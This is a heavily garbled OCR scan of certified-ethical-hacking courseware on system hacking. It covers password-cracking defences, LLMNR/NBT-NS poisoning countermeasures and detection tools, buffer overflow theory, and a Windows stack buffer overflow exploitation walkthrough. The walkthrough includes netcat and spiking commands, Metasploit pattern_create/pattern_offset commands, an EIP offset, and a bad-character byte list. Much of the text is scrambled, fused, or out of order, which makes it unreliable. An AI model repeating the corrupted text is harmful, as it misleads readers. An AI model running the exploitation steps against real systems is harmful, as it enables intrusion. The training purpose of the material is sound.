bein
can

a ndprotocols
protocls
found detonary
with weak
encryption

toringpasswords
‘void nan unsecured location

defautpasswords
Oonot use anysystem

How to Defend Password Cracking

against (Cont'd)
ake passwords
by
hardto gues requiing-12alphanumeri
charactors
of of combination
consisting

Ensure thatapplications
netherstorepasswords
i n memorynor weit

Usea random
string befor
a) 352 preficorsffitothepassword eneryption

Disallowtheuse

Monitortheserver's
of
of pasword
suchadate birth,s pouse
chi,

logsforbrtefore stacks ontheusers’

accounts
or pet'sname

6
Module Got
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
How to Defendagainst
PasswordCracking
(Cont'd) CEH
EE.ete stem 08 passwort partir
protected on devices
tht ae suscep tops tess

employees
reused thwart
sel
‘Tain
tate dumpster
to socalengineering suchas
cedentils
shoulder surfing
and diving, which

Perform
password hen
screening new ae createdtoavoidusing
passwords usedpasswords
commonly

Use
two
or fr to
provent
factor mit factorauthentiaton example
usingCAPTCHA automated
attacks

Secure

physi
access
an contol to ofline passwordattacks
to prevent
systems

accessible
only
databasesare
Ensuethatthe password a nd
enerpted to administrators
system

Maskthe
of
passwords
dplay
onthe
to screen avoidshoulder attacks
surfing

How to Defendagainst PasswordCracking

Thebestpractices
to protect password
against cracking
are listedas follows:
+

=
Enableinformationsecurity
Donot usethe same
audit to
password
monitor
during change.
andtrackpassword
the password
attacks.

*
passwords.
Donotshare
=
Donot use passwords
that can befoundi n a dictionary.
Donot use cleartextprotocols
or protocols
with weakencryption.
change
Set thepassword policy
to 30 days.

storingpasswords
‘Avoid location.
i n an unsecured

Donot use anysystem's

defaultpasswords.
Make passwords hard to guessby using 8-12 alphanumeric characters, with a
combinationof upper-and lower-case letters,
numbers, and symbols.
Thisis because
strongpasswords Therefore,
are hard to guess. the more complex
the password, the
lessvulnerableit is to attacks.
Ensurethat applicationsneitherstore passwords to memorynor write themto diski n
cleartext.Passwordsare always vulnerableto theft if theyare storedi n memory.Once
the password is known,it is extremely
easyforattackers to escalatetheir rights
i n the
application,
Use a randomstring(salt)
as a password
prefixor suffixbeforeperformingencryption.
Thisnullifiespre-computation
andmemorization, Becausethe saltis usually
different

ical andCountermensores
Mackin ©by E-Comel
Copyright
for eachindividual, for attackersto construct tableswith a single
it is impractical
encrypted
EnableSYSKEY
password.
version of eachcandidate

with a strongpassword
UNIXsystems
to encryptand protect
typically
use a 12-bitset.

the SAM database.

Usually,
the passwordinformationof storedin the SAMdatabase.It is
user accountsis
very easy for password-cracking
softwareto targetthe SAM databaseto access
passwords, SYSKEYprotectspassword information
stored i n the SAM data against
password-cracking
softwarethrough strong techniques.
encryption It is more difficult to
crackencryptedpasswords thanunencryptedones.
information(e.g.,
Neveruse personal birth date,or a spouse's,
child’s,
or pet'sname) to
Otherwise,
passwords,
create it becomes quiteeasyfor thosecloseto you to crackyour
passwords.
Monitortheserver'slogs
for brute-forceattackson user accounts.Although
brute-force
attacksare difficultto stop,they a re easily
detectable
if thewebserverlogis monitored
Foreachunsuccessful loginattempt,a n HTTP401 status codeis recordedi n the web
server logs.
Lockout thoseaccountsthat were subjected to too manyincorrect password
guesses.
Thisprovides
protection againstbrute-forceandguessingattacks.
Manypassword snifferscan besuccessfulif the LANmanagerand NTLM authentication
are used.DisableLANmanagerandNTLMauthenticationprotocols
onlyafter ensuring
that it doesnot affectthe network.
a periodic
Perform auditof passwords
i n the organization.

Check application
any suspicious that stores passwords in memoryor writes them to
disk.
Unpatched
systems
can reset passwords
during
buffer overflow or denial-of-service
attacks.Makesure to update
the system.
Examine
whether
failedlogin
multiple the
accountis i n use,deleted,
attemptsare detected.
or disabled.
Disablethe user account if

Enableaccount lockoutwith a certain numberof attempts,counter time, andlockout

duration,
of the most effectivewaysto managepasswords
‘One i n organizations
is to set an
automatedpassword reset.
Makethe systemBIOSpassword protected,
particularly that are susceptible
o n devices

physical
to suchas servers andlaptops.
threats,
to thwart socialengineeringtactics,suchas shouldersurfing
Train employees and
dumpsterdiving,
Configure
whichare usedto steal
password
policies
user
Policy
underthe Group
credentials.
objecti n the Windows OS.

Perform
password whennew passwords
screening are createdto avoidusingcommonly
usedpasswords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Usetwo-factoror multi-factor for example,
authentication, use CAPTCHA
to prevent
automatedattackson criticalinformationsystems.
Secureandcontrolphysical
access to to preventoffline password
systems attacks
Ensure password databasefiles are encrypted onlyby system
and accessible
administrators.
Maskthe display
of passwords
onscreen to avoidshoulder-surfing
attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
LLMNR/NBT-NS
Poisoning
Disabling
LMBNR Disabling
NBENS

rete ton

How to Defendagainst LLMINR/NBT-NSPoisoning

from being
Theeasiestway to preventa system attackedbya perpetrator
is to disableboththe
services i n theWindows
LMINRandNBT-NS employ
OS.Attackers theseservices to obtainuser
credentials
andgainunauthorizedaccess to theuser'ssystem.
to disableLLMNR/NBT-NS
Steps
DisablingLMBNR
in
any
version
of Windos

the Local
Open Policy
Group Editor.
Navigate Computer
to Local ->Computer
Policy > Administrative
Configuration
> Network>
Templates DNSClient.
In theDNSClient,
double-click
Turnoffmulticast
name resolution.
Selectthe Enabled
radiobuttonandthenclickOK.

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Disabling
NBT-NS
Figure6.28:
in
LMBNRWindows
Disabling

Open
andclickon the
Center, to and
theControlPanel,navigate Network Internet > NetworkandSharing
Change
adapter optiono n the right-hand
settings side.
Right-click
on the networkadapterandthenclickProperties, selectTCP/IPv4,
and
thenclickProperties.

Under theGeneraltab,goto Advanced-> WINS.

Fromthe NetBIOS
options, checkthe “Disable
NetBIOS
over TCP/IP―
radiobutton
and clickOK.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Advanced Settings
TCP/IP

SettingsDNs WINS

WS adresses,order
of
we:
da,

TOPAD
enable
u nsosTs
is Itapples
FUPOSTSloan enabled
e enables

eokun
to for al conection which

InportLMHOSTS..
Net8105
seting
Defauts
Use
' Net
setting
fom
tnsblethe
OHCP
server
nt
NetBlOS
used
or theDHCP
if
sever does provide
over TDP.
NetSIOS
settng,

Enable
NetBIOS
over TCPAP
DabNe Pi]

Figure
629:Disabling
NBT-NS
in Windows

6
Module 60?
Page tical andCountermensores
Making Copyright©
by Comet
 Toolsto DetectLLMNR/NBT-NS
Poisoning
‘Vina ap

LLM
NANSONSSpoon

Tools to DetectLLMNR/NBT-NSPoisoning
Networkadministratorsand cybersecurity
professionals
use tools such as Vindicate,
got-
responded,
andRespounder to detectLLMNR/NBT-NS
poisoningattacks.
=
Vindicate
Source:https://github.com
Vindicate is an LLMNR/NBNS/mDNS
spoofing
detection toolkit for network
administrators. professionals
Security usethistool to detectn ame service spoofing,
This
tool helps
themto quickly
detectandisolateattackerso n their network.It is designed
to
detecttheuse of hacking
toolssuchas Responder, Inveigh, NBNSpoof, andMetasploit’s
LLMNR, NBNS, and mDNSspoofers while avoiding false positives. It exploits
the
Windowsevent logfor quick withan ActiveDirectory
integration network.

Modul
6 608
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Ethical a n Countermeasures
aching {am 21250Cetied tcl Hacer
SytemHacking

Windows
PowerShell

it -
\Users dein Desktop\VindicateTog!-master\ReleaseBinarie:
Copyrsght(C) DannyHout
Wo
‘ndicate 2017

trih ABSOLUTELY
ARRAN
Ace (Onlyone usage of eachsocket addr
abiing. Port 5359 tn use of snsuffictent prsvi ten
nn? 1020-20
"adjusted f0 Lows
ctive WPAO service at 10.10.40-34, claiming Responder
Confidencelevel adjusted
to Certain
on 8 TCP port at 10,40-30-11
service
‘from ciavaing10.10.10.12
£0.410,40.14
ai 10-10.10:12clavmingResponder
ervice WPAD
response
©From 30.10:10:42claiming10-10-10-11

‘rom
10.

18TCP port a€10:10:10.4

‘from
10,10.10.14claiming 20.20.20.12

forto.t0.41 clavming
8 20.10. 40.3
Re: respon
st 10:10:

got-responded
Figure6.30
Screenshot the
showing
output ofVindicate

Source:https://github.com
got-responded helps professionals
security spoofing.
to checkfor LLMNR/NBT-NS This
tool starts in the defaultmodeandchecksforbothLLMINRand NBT-NSspoofing
but
doesnot sendfakeSMBcredentials.

Modul
6 608
Page ical Mackin
and ©
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
 ubuntu@ubuntu:-/gotresponded

Mo\tn
now

started

Spooringdetected by tp 1.01011, gotng dark Tor 36

tlent for 2608, don

y-ii 02:55 Spootingdetected by tp TOOT TT, gong Gi

Respounder
Figure6.31
Screenshot
of
theoutput gotresponded
showing

Source:https://github.com
Respounder detectsthe presenceof a responder
i n the network.Security
professionals
usethistool to identify
compromised machines
beforehackers exploit
password
hashes.
Thistool also helps to detectroguehostsrunningresponder
professionals
security on

public e.g,,i n airports cafes

networks,
Wi-Fi
and
andavoidjoining
suchnetworks.

ubuntuevbuntu:-/respounder

632:Screenshot
Figure outputof Respounder
showing

6
Module 610
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 Vulnerability
Exploitation
remote Thesteps
system. Involved
ae a follows:

dontiythevulnerability
Determinethe riskassodated
withthevlneabilty

Determinethecapabilitywneraity
ofthe

theexploit
Develop

Select
the method
fr delivering
loca or remote

Cainremoteaccess

Vulnerability
Exploitation
Vulnerability
exploitation
involvesthe execution of multiple
complex,
interrelatedstepsto gain
access to a remote system.Attackers c an performexploitation
onlyafter discovering
vulnerabilitiesin that targetsystem. vulnerabilitiesto develop
Attackersuse discovered exploits
anddeliverandexecute the exploits on the remote system.

Steps vulnerabilities:
involvedin exploiting
1.
the
Identify Vulnerability
Attackersidentify the vulnerabilitiesthat exist i n the targetsystemusing various
techniques discussedi n the previousmodules. Thesetechniques includefootprinting
and reconnaissance, scanning,enumeration,andvulnerability analysis.
After identifying
the OSsusedandvulnerableservices runningo n the targetsystem, attackersalsouse
various online exploit
sites suchas ExploitDatabase (https://www.exploit-db.com)
and
SecurityFocus (https://waw.securityfocus.com)
to detectvulnerabilitiesi n underlying
OS
andapplications.
with the Vulnerability
Determine the RiskAssociated
identifying
After a vulnerability,
attackersdeterminethe risk associatedwith the
vulnerability,
‘e.,whetherexploitation
of this vulnerability
sustains the security
measures
on
the
target
system.
Determinethe Capability
of the Vulnerability
If theriskis low,attackers thecapability
can determine
gain remote access to the targetsystem,
of
exploiting
vulnerability
this to

ical andCountermensores
Mackin ©by E-Comel
Copyright
4.
Develop
theExploit
After determiningthe capability attackersuse exploitsfromonline
of the vulnerability,
exploit Exploit
sites suchas Database(https://www.exploit-db.com),
or develop their

.
‘own
using
exploits exploitation toolssuchasMetasploit.
Selectthe Methodfor Delivering
Localor Remote
~

Attackersperform
remote exploitationover a network to exploit
vulnerability existing
in
theremote systemto gainshellaccess.If attackers
haveprior accessto thesystem, they
perform to escalateprivileges
localexploitation or execute applicationsi n the target
system.
- GenerateandDeliverthe Payload
Attackers,
as partof exploitation,
generate or selectmalicious payloads
using toolssuch
anddeliver it to the remote systemeitherusingsocialengineeringor
as Metasploit
through
a network.Attackersinjectmalicious shellcodei n the payloads,
which,when
establishes
executed, a remote shellto thetargetsystem.

. GainRemoteAccess
the payload,
After generating attackersrun the exploitto gainremote shella ccessto the
target Now,attackerscan run various maliciouscommands
system. on the remote shell
andcontrolthe system,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Sites
Exploit

Sites
Exploit
‘Attackers
can use various exploit
sites suchas Exploit
Database,
SecurityFocus,
etc. to discover
vulnerabilities
anddownload or develop exploitsto perform remote exploitation
on the target
Thesesites includedetailsof the latestvulnerabilitiesandexploits.
system.
Exploit
Database
Source:https://www.exploit-db.com

Exploit
Databaseincludes
detailsof the latest vulnerabilities
presenti n various OSs,
devices,
applications, etc. Attackers can search ExploitDatabaseto discover
vulnerabilities
i n that targetsystem,download the exploitsfromthedatabase,
anduse
exploitation
toolssuchas Metasploit to gain remote access.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 633:Screenshot
Figute of Exploit
Database

SecurityFocus
Source:https://www.securityfocus.com
SecurityFocus
contains a databaseof the recentlyreportedcybersecurity incidentsand
software
bugs,alongwith a searchablearchiveofcommon vulnerabilities andexposures
(CVEs).
Attackerscan searchSecurityFocus to detectvulnerabilitiesi n the targetOSand
applications.
< seu
Symantec
Connect
ts
facis―

6:34:Screnshot
Figure ofSecurityFocus

06
Module tt
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
vulpB,
Source:https://vuldb.com
VulD8includesdetailsof the latestvulnerabilitiesand exploits,
rated basedon the
highest exploitation probability.
Attackers can searchthe VulDBto identify
vulnerabilitiesandexploit
themor even fullyautomate the exploitation,

MITRECVE
635:
Figure Secenshot of vuD8

Source:https://eve.mitre.org
MITREmaintains a CVEdatabasethat contains detailsof the latestvulnerabilities.
Attackers
c an searchMITRE CVEto discover
vulnerabilities
that exist i n the target
system.

SearchResults

Figure6:36:
Serenshot of

ical
MITRECVE

andCountermensores
Mackin ©by E-Comel
Copyright
 1
BufferOverflow CEH
“a.
arememory
locations
Abuter san
toa to handle
|@Bute oerfiw or overun
theaoestedbutter
its
runtime
8
data
of adjacent
common
allocated program
vulnerability
i n an applations
oapplaton

thataccepts
or programs moredts than

exceed
neighboring
memory Buller
locations data
to
©.Thisvulnerability
the
butfer
allowsthe application
to the whe wtng andoverwrite

exploit
‘tackers
damage
buteroverfiow to injectm alicious
vulnerability codeintothebute to files,moafy

‘Why
Programs
Applications
Buffer
Overflow?
Are and Vulnerablete

of
Jang

and semen
oder versionsprowamming

u nsafe winerable
Using
argues
fonetons
© wean

© Improper
memory
inthe tack
adepresent
aocaton

BufferOverflow
A buffer is a n area of adjacent
memory locationsallocatedto a program or application
to
handleits runtime data.Bufferoverflowor overrun is acommon vulnerability i n applications
or
progyramsthat acceptm ore data than the allocatedbuffer. This vulnerability allowsthe
appliication to exceed the buffer whilewritingdata to the bufferand overwrite neighboring
memorylocations.Furthermore, this vulnerability
leadsto erratic systembehavior, system
crash, memoryaccess errors, etc. Attackersexploit a buffer overflowvulnerability
to inject
maliciouscode into the buffer to damage files,modifyprogram data,access critical
escalateprivileges,
inforr‘mation, gainshellaccess,andso on,
Why‘Are Programs andApplications Vulnerableto Buffer Overflows?
Boundary
checksa re not performed fully,or, i n most cases,entirely
skipped
Applications
that use olderversions of programming languagesinvolveseveral
vulnerabilities
Programs
that use unsafeandvulnerablefunctionsfail to validatethebuffersize
andapplications
Programs that donot adhere to goodprogramming practices
Programmersthatfail to set properfiltering
andvalidationprinciples
i n the applications

Systems
that execute code presentin the stacksegment are vulnerable to buffer
overflows
Improper
memoryallocationandinsufficientinputsanitizationin the application
leadto
buffer
overflow
Application
attacks
for accessingheap
programs that use pointers memory resulti n buffer
overflows
ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
ofBufferOverflow:Stack-Based
Types BufferOverflow
CEH
1 arestateand in
(©.
Astackisw edfor aloation
memory storesthevariables “Latin
Fist.out―
(UFO)
oder

|
a

There two tack operations:

stats
(©When
>
function executionastackre is ESP
(Extended Ponte)Stack
Stack Frame

Fetum
adress
stored
onthe pace E Pregister utr

thetatof
over,
butler thenattackers
tae contreofthe
[Pregetertoreplae etn addres he £0― BasePointer)
functionwah themals code lowsthem (Extended
cress tothetreet stm
toapinshel Instruction
[P(Etended > Return
Pointer) Adress

of BufferOverflow:Stack-BasedBufferOverflow
Types
(Cont’a) CEH
4

6
Module 617
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 ofBufferOverflow:Heap-Based
Types BufferOverflow
\@ Heap
memory
allocated
at
runtime
during
the
exscuton
program
dynamically
program of he anit stores

when
a occurs
Heap:basedovertiow blocko f memoryisallocated
to heap,anddat is writen without any

‘Ths
vulnerability
tableete headers,
leads
to overwiting

heapbased
_xtackersexlot
object
dynamic heap
pointers,
bufferovertowto takecontrol
heap-baseddatatual

oftheprogramsexeston. Unikestack
overtows,
funtion

of BufferOverflow
‘Types
Thereare two typesof buffer overflow,namely buffer overflowand heap-
the stack-based
basedbufferoverflow.
=
Stack-Based BufferOverflow
In most applications,
a stackis usedfor static memoryallocation,Contiguous blocksof
memoryare allocatedfor a stackto store temporary variablescreatedbya function.
Thestackstores thevariablesin “Last-in (LIFO)
First-out― order.Whenevera functionis
called,
the required

operations,namely, PUSH,
for
memory storingthe variablesis declaredon the stack,
the function returns,the memoryis automatically
andwhen
deallocated.Thereare two stack
whichstores data onto the stack, and POP,whichremoves
datafromthestack.
Stackmemoryincludesfive typesof registers:
© EBP: ExtendedBasePointer(EBP), alsoknownas StackBase,
stores the addressof
the firstdataelementstoredonto the stack
ESP:ExtendedStackPointer(ESP) of the next dataelementto be
stores the address
storedonto thestack
InstructionPointer(EIP)
EIP: Extended stores theaddress
ofthe next instruction to
beexecuted
ESI:ExtendedSourceIndex (ESI)
maintains the source index for various string
operations
maintains the destinationindex forvarious
EDI:ExtendedDestinationIndex (EDI)
stringoperations
ical andCountermensores
Mackin ©by E-Comel
Copyright
AAstack-basedbufferoverflowoccurs whenan applicationwrites more data to a buffer
than what is actuallyallocatedfor that buffer. To understandstack-basedbuffer
you must focuson the EBP,
overflow, EIP,andESPregisters.EIPis the most important
read-onlyregister,which stores the addressof the instruction that needsto be
subsequently
executed.

ButferSpace

IP (Extended
Pointer)
BP (Extended
Base

instruction
Pointer) > RetumAddress

Whenever
Figure
of
6.7: Representation
tack

a functionstarts execution,a stackframethat stores its information is

pushed onto the stackand storedi n the ESPregister.Whenthe function returns,the
stackframeis popped out from the stackand the execution resumes fromthe return
addressstoredon the EIPregister.Hence, if an application
or program is vulnerableto
bufferoverflowattack, then attackers takecontrolof the EIP registerto replacethe
return addressof thefunctionwith maliciouscodethat allowsthemto gain shellaccess
to the target
system.
Bottomof Stack Bottomof Stack

SP->) Endotstact >) dot ack

function attacker
NormalStack
‘A StackwhenAttacker
cals 3 stackwhen overfiows
‘ute
in function
to smashthestack

Figure638:
Demonstrationofstackbased
b er overtiow

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Heap-Based BufferOverflow
Aheap I s usedfor dynamic memoryallocation,Heap memoryis dynamically allocatedat
run
time
heap
heap
duringof the execution the program,andit
memoryis slowerthanaccessing
memoryis not performed
storesthe programdata. Accessing
stackmemory.Theallocationanddeallocationof
automatically.
Programmers must write codefor the
allocation{malloc()] of heap memory,and after the execution is complete, theymust
deallocatethe memoryusingfunctionssuchas free()
Heap-based overflowoccurs whena blockof memory is allocatedto a heapanddatais
written without any bound checking. Thisvulnerabilityleadsto overwriting links to
dynamic memoryallocation(dynamic object
pointers),heap headers,heap-based data,
virtualfunctiontables, etc. Attackersexploit
heap-based bufferoverflowto takecontrol
of program’s
the
execution.
commonly
Bufferoverflowsheap occur in the memoryspace,andexploitation
ofthese
bugs is differentfromthat of stack-based
bufferoverflows.Heapoverflowshavebeen
prominently discovereda s softwaresecurity bugs.Unlike stack overflows,
heap
overflowsare inconsistentandhavevaryingexploitationtechniques.

buffer
Faure6 39;Demonstrationof heap-bosed overflow

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BufferOverflowin
Simple C

BufferOverflow in
Simple C
The examples showni n the screenshots and heap-based
demonstratestack-based buffer
overflow:

Figure640:
Screenshot
C demonstrating
of program stack-based
butter
overflow

Modul
Page
6 624
tical
Making
and by CountermensoresCopyright©
Comet
 641:
Figute Sereenshot theoutputofstackb ased
showing bute overtow

Figure of Cprogram
642:Serenshot demonstrating bulferoverflow
heap-base

Screenshot
Figure643:
of buffer
overflow
the output heap-based
showing

ical
Mackin
and Copyright
©
by Countermensores E-Comel
 WindowsBufferOverflowExploitation CEH
Steps
involvedin exploiting
Windowshaxedbuffer overflowvulnerability:

vero
BD
Byrevo
ine Ed.
eeriy
nd tracers

ting ena
the
et mode

Identify
the
offset Gonerate
shelicode
vert te pr
sonrote

Windows Buffer Overflow Exploitation

(Cont'd)
slowsstackerto send
spiking
UDP
buffer
pkinghelo attackersto identy
T CPor
crafted othe wunerable
packets server inordertomate crash
overtowvulnerbitesnthe targetapoications

Modul
6 622
Page tical andCountermensores
Making Copyright©
by Comet
 WindowsBufferOverflowExploitation
(Cont'd) CEH

Windows Buffer Overflow Exploitation

(Cont'd)
PerformFuszing

-tackers usefutingto send9

serverso that experiences
to the target
bufferoverflowandoverwrites the Ei regeter
helpsin identifying bytes
thenumberof

to
crash
‘uzaing
equied the targetsever

‘This
In injecting
in the
information
helps determining exact
reise, whichfurtherhelps
malicious
shelled

6
Module 624
Page tical andCountermensores
Making Copyright©
by Comet
 WindowsBufferOverflowExploitation
(Cont'd) CEH

Windows Buffer Overflow Exploitation

(Cont'd) CEH
Tontfy the Offeot

act
the
satacers ue the Metasploit
ramework
locationwhere EI cegister ie bengoverwtiten are to offset
rubytools identitythe and

Modul
6 625
Page tical andCountermensores
Making Copyright©
by Comet
 WindowsBufferOverflowExploitation
(Cont'd) CEH

Windows Buffer Overflow Exploitation

(Cont'd) CEH
theEIP Register
‘Overwrite
Cverwrtingthe IP register
allows
attackers
to ident whether
theEPregister
can be controled
andcan be

GE),

Modul
6 626
Page tical andCountermensores
Making Copyright©
by Comet
 WindowsBufferOverflowExploitation
(Cont'd) CEH

Windows Buffer Overflow Exploitation

(Cont'd)
entity Bad Characters

Before
injecting
theshelode

stacker identity
thatmaycause

thebadehars

Characters
such
te, ie,

badchare

06
Modul 627
Page tical andCountermensores
Making Copyright©
by Comet
 WindowsBufferOverflowExploitation
(Cont'd)
Tdenlfythe RightModule

Windows Buffer Overflow Exploitation

(Cont'd)

06
Modul 628
Page ti l andCountermeasures
Macking
©
Copyightby E-Comell
 WindowsBufferOverflowExploitation
(Cont'd) CEH

Windows Buffer Overflow Exploitation

(Cont'd)

WindowsBufferOverflow Exploitation
Exploiting
Windows-based involvesthe following
bufferoverflowvulnerability steps
Perform spiking
=
Performfuzzing
=
Identify
the offset
 OverwritetheEIPregister
Identify
badcharacters
Identify
the rightmodule
+
Generate shelleode
Gain root access
Beforeexecuting steps,you must installand run a vulnerableserver on the
the following
victim’s Debugger,
machine,then run Immunity
debugger.
andfinally attachthe vulnerableserver the
to
PerformSpiking
Spikingallowsattackersto sendcraftedTCPor UDPpackets to the vulnerableserver to makeit
crash.
It
following helps
attackers vulnerabilities
application
to identifybufferoverflow
stepsare involvedi n spiking:
i n thetarget The

Step
‘+
-1: Establish
server
a connection with the vulnerable

showni n the screenshotbelow,

‘As you can use the
using
following
Netcat
Netcat command to
establisha connection with the targetvulnerableserver and identify the services or
functions
ne -nv
by
provided
the
<Target IP>
server.

<Target Port>

@parrot
#nc 10.10.10.19 9999
-nv

(UNKNOWN)[10.10.10.10] 9999 (7) open

rl Enter HELP for help.

iON [gmon ]
6006 [gdog_value]
STET [kstet value]
ER [gter_value]

Figure644:Sereenshot
ofNetca

ical andCountermensores
Mackin ©by E-Comel
Copyright
Step2:Generatespike
-

templates andperform spiking

Spiketemplates define the package formats used for communicating with the
vulnerableserver. They and identifying
a re usefulfor testing functionsvulnerableto
buffer
overflow
exploitation
spiking
Usethe following
spike
template
for on theSTATS
function

Â¥ 4v
PlainText TabWidth:

Figure
Now,sendthe packages
645:Screenshot STATS
showing spike
template
to thevulnerableserver usingthe following
command
generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR
SKIPSTR

Topo To OTe SD

Screenshot
Figure646:
of vulnerable
the output spiking
showing

ical
server

andCountermensores
Mackin ©by E-Comel
Copyright
‘As
6.47: Figure Screenshot Debugger
of immunity
functionis not vulnerableto buffer overflow,
we haveidentifiedthat the STATS we

repeatthe same processforthe TRUNfunction.Usethe following spike template

for
onTRUN
function:
spiking the

trunsp
earch Tools Document

DB open v
*
B trunspk
x
readlin

PlainText v_TabWidth:
4¥ —__Ln3,Col24

Now,sendthe packages
Figure
TRUN
showing spiketemplate
648:Screenshot
to thevulnerableserver using the following
command
<Target
generic_send_tep IP> <Target Port> spike_script SKIPVAR
SKIPSTR

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘As
shownin
Screenshot
Figure649:
the screenshot,
of vulnerable
server
theoutput spiking
showing
the TRUNfunctionof the vulnerableserver hasbuffer
overflowvulnerability.
Spiking thisfunctionoverwrites stackregisters suchas EAX, ESP,
EBP, theycan gain shellaccess to the
andEIP.If attackerscan overwrite the EIPregister,
targetsystem,

Debugger
650: Screenshotof immunity
Figure showing vulnerabilty
bufer overfiow

ical andCountermensores
Mackin ©by E-Comel
Copyright
Perform
Fuzzing
After identifying
the bufferoverflowvulnerability in the targetserver,we must perform fuzzing.
Attackersuse fuzzingto send a largeamount of datato the target server so that it experiences
bufferoverflowandoverwrites the EIPregister, Fuzzing helps in identifyingthenumberof bytes
requiredto crashthe targetserver. Thisinformationhelps i n determining the exact locationof
whichfurtherhelps
the EIPregister, maliciousshellcode.
in injecting
For example,
the screenshotbelow showsthe sample
Python
scriptusedby attackersto
perform
fuzzing:

gure
buffmultiplies
Whenyou execute theabovecode,
showing
Screenshot
651: Python
seit for faring
for everyiteration of thewhileloopand
sendsthe
buff
datato thevulnerableserver. Asshownin the screenshots,
crashedafterreceivingapproximately
register.
thevulnerableserver
2300 bytesof data,but it did not overwrite the EIP

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
652:Screenshot Debugger
of immunity showing
vulnerable
server before
bufferoverflow

6 showing
Figure53:Sereenshot
of
theoutput fuzzing
vulnerable
server

ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify
theOffset
Throughfuzzing,
we haveunderstoodthat we can overwrite the EIPregisterwith 1 to 2300
bytes
of data.Now,we will use the following
pattern_createRuby tool to generaterandom
bytes
of data:
/usr/share/netasploit-framework/tools/exploit/pattern_create.rb
By
3000

655:
Figure Screenshot
showing
Metasploit
patterncreateoutput

ical andCountermensores
Mackin ©by E-Comel
Copyright
Run
the follllowing bytes
scriptto sendtheserandom
Python to thevulnerable
server:

656: Figure Screenshot

Whenthe abovescriptis executed,
scrit sending
of Python
randombytes
randombytestotheserver
of dataare sent to the targetvulnerable
server, whichcausesa buffer
overflowi n thestack.Thescreenshot clearly showsthattheEIP
is with must
down in
registeroverwritten randombytes.
findtheoffsetofthosebytes.
You note the randombytes EIPand

657;
Figure Screenshotof immunity showing
Debugger vulnerable
server
after
thebufferoverfiow

ical andCountermensores
Mackin ©by E-Comel
Copyright
Runthefollowing to findthe exactoffsetof therandombytes
command in theEIPregister:

/usz/share/netasploit-framework/tools/exploit/pattern_offset.rb
3000 386F4337
-1
-q

Figure
68 showing
Screenshot pattern_offet
Metasploit output
Overwritethe EIPRegister
showni n the
‘As screenshot,
we haveidentifiedthat the EIPregister
is at an offsetof 2003,
bytes.
Now,run the following
Python
to wecontrol
script check whether can the EIPregister.

659:
Figure Sereenshoof Pthon scrip
necting
in
the
EIP
shellcode register

ical andCountermensores
Mackin ©by E-Comel
Copyright
{Asshowni n the screenshot,
the EIPregister
can be controlledand overwritten with malicious
shellcode.

Identify
BadCharacters
Beforeinjecting you must first identify
the shellcodeinto the EIPregister, badcharacters
that
may cause issues in the shellcode. You can obtain the badcharsthrough a Google
search.
Characterssuchas no byte,Le.,“\x00―,
are badchars.
badehars

x1
-

(°\00\ x02\x02\03\ x04 \ x05 \x06\x07\x08\x09\x0a\x0b\x0e\x0d\x0e\x0#\x10\x11\

2\x13\x14\x15\x16\x17\x18\x19\x1a\xIb\x1e\x1d\x1e\x1£"
"\xe20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x24\x20\x2£\x30\x31\x32
"\
xt \ 42 \ 434
\x3b \3e40"
\ x33 \34\x35\36\ x37 x38\39 \x3a \x3e x3 \ xe \ x3
\ 454 6\ x4 7\ 48 \ 49 \cda\ x4 \x4c\ 4d \ do cdf 250\H51\x52\x53
\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5£"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6£\x70\x71\x72
TE"
\73\x74\ x75 \76\X77\x78\x79\x7a\xTB\x70\xTA\RT\
"\x80\ x81 \x82\x83\x84\x85)\x86\x87\x88\x89\x8a\x8b\x8c\xBd\x8e\x8£\x90\x91\x92
\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9E"

\
\xb5\xb6
4
\xb7
\xbs
\xcb9
\xba
\xhb
\xbe
\xbd \xb2
\xa0 \xal \xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\\xab\xac\xad\xae\xaf\xb0\xb1

xb3\xb \xbe\xbE―
x05xed edb \xef\xd0\xd1
\xd2
"\xc0\xet \xe2\xe3\ \xe5\xc6\xc7\xe8\xe9\xca\xcb\xce\xed\xce
\ xd3 \xed \ \ xd \ ed \ xe \ xd
\ ed6\ 7 \ xd \ 9 \ eda\
\xe2\xe3\xe4\x05\xo6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\x£2
*\xe0\xe1

\x£3\x4 \xt5\x£6\x7 \x£8\x£9\xfa\xtb\xto\xfd\xte\xf£")

Next,run thefollowingPython scriptto sendbadchars along with theshellcode:

ical andCountermensores
Mackin ©by E-Comel
Copyright
InImmunityDebugger,
661: Screenshotof Python
Figure

on
the
seit
right-click ESPregistervalue,
for
sending
badchas,
in
thenclickon “Follow Dump,―
and
finally Youwill find that thereare n o badcharsthat create problems
observethe characters. in
theshellcode.

Identify the Right

Figure6.62:
Module
of Debueger
showing
Screenshotimmunity ESP
d ump

In this step,we must identify

the rightmoduleof the vulnerableserver that lacksmemory
protection. In ImmunityDebugger, you can use scriptssuchas mona.pyto identify such

ical andCountermensores
Mackin ©by E-Comel
Copyright
modules.You must downloadmona.py fromGitHuband copy it to the pathImmunity
Debugger > PyCommands. Now,run the vulnerableserver andthe ImmunityDebuggeras.
